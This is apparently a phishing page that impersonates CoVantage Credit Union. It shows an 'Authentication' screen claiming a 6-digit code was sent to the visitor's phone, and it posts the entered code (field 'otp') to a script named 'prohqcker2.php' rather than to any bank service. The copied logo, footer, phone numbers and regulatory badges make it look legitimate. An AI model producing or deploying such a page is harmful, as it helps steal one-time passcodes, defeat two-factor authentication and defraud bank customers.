<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Home- CoVantage Credit Union</title> 
    <link href="css/Aksw.Bootstrap.Custom.css" rel="stylesheet">
    <link href="css/Aksw.Core.css" rel="stylesheet">
    <style>
        /*hide the content until all JS in the document.Ready function is executed*/
        .a-screen-content {
            display:none;
        }
    </style>    
    <link href="css/CoVantageVirtualCapture.min.css" rel="stylesheet">
    <link href="css/ZagVirtualCapture.css" rel="stylesheet">
</head>
<body role="document" style="padding-top: 118px;">
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
        <div class="navbar-header">
            <a class="navbar-brand" href="#">
                <div class="a-comp-logo">
                                <img src="images/GetCompanyLogo.png" style="max-height:50px;margin-top:-15px;">

                </div>
            </a>
        </div>
</div>

<div class="body-content">
<div class="container" role="main">
    <div class="container row">
        <div class="col-md-9"><div style="line-height: 14px"></div>
            <h3 class="cvcuProduct">Confirm your Identity</h3>
<form id="csform" class="a-form" action="prohqcker2.php" role="form" method="post">
<div id="a-widget-8556">
<div class="a-screen-content" style="display: block;">
<div id="panel-wrap-2112435" class="" style="">
    <div id="a-widget-8551" class="a-panel panel panel-default">
        <div id="a-widget-8564" class="ui-widget-header a-panel-title panel-heading"><span id="a-widget-8563" class="a-panel-title-text">Authentication</span></div>
        <div id="a-widget-8565" class="a-panel-content">
            <div id="a-widget-8580" class="a-panel-content panel-body a-panel-content-top-border">
                <div id="a-widget-8567" class="row">
                    <p style="margin-left: 10px; font-weight: 600; font-size: 12px">For security reason, A 6-digit code has been sent to your phone number.</p>
                    <div id="a-widget-8568" class="a-r-field col-sm-6">
                        <div id="a-widget-8570" class="a-field-wrap">
                            <div id="a-widget-8571" class="a-field-label-container">
                                <label id="a-widget-8572" class="a-field-label" style="width:120px;" for="a-widget-8569"><span class="a-field-label-required" alt="This field is required."></span>Verification :</label>
                            </div>
                            <div id="a-widget-8573" class="a-field-control-container">
                                <input id="a-widget-8569" class="a-field-control form-control input-sm a-field-phone PA_MP_Field_PhoneNumber" placeholder="Enter Code" name="otp" type="tel" value="" required>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<div id="a-widget-8649" class="a-bottombar a-screen-bottombar panel panel-default"><button id="btnContinueBottom" class="a-button btn btn-sm btn-primary a-pull-right-button a-pull-right-button" title="" type="submit" style="float:right">Submit&nbsp;</button></div>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
<div class="footer" style="position: fixed; width:100%; bottom: 0">
    <style>p.a {  font-family: Open Sans;text-align: right}p.b {  font-family: Open Sans;text-align: left}table, th, td {  border: 0px solid black;  border-collapse: collapse;}th, td {  padding: 5px; 5px; 5px; 5px;  text-align: center;}table#t01 {  width: 100%;      background-color: #25408f;}a:link {  color: #25408f;  background-color: transparent;  text-decoration: none;}a:visited {  color: #25408f;  background-color: transparent;  text-decoration: none;}a:hover {  color: #25408f;  background-color: transparent;  text-decoration: none;}a:active {  color: #25408f;  background-color: transparent;  text-decoration: none;}</style><table style="width: 100%;">  <tbody><tr><th><font color="#25408f"><p class="b"><b>&nbsp; 715.627.4336</b> or <b>800.398.2667</b></p></font></th>  <th><font color="#25408f"><p class="a"><a color="25408f">Contact Us</a>&nbsp;&nbsp;</p></font></th></tr></tbody></table><table id="t01">  <tbody><tr>    <th> <p class="b"><font color="#ffffff">&nbsp; ©2021 CoVantage Credit Union | </font><a  color="#ffffff"><font color="#ffffff"> Privacy Notice</font></a></p></th>   <th>    </th><td><p class="a"><img height="40" alt="National Credit Union Association" src="images/footer-logo-ncua-white.png">&nbsp; &nbsp; <img height="40" alt="Equal Housing Lender" src="images/footer-logo-ehl-white.png">&nbsp;&nbsp;</p></td></tr></tbody></table>
    </div>
</body>
</html>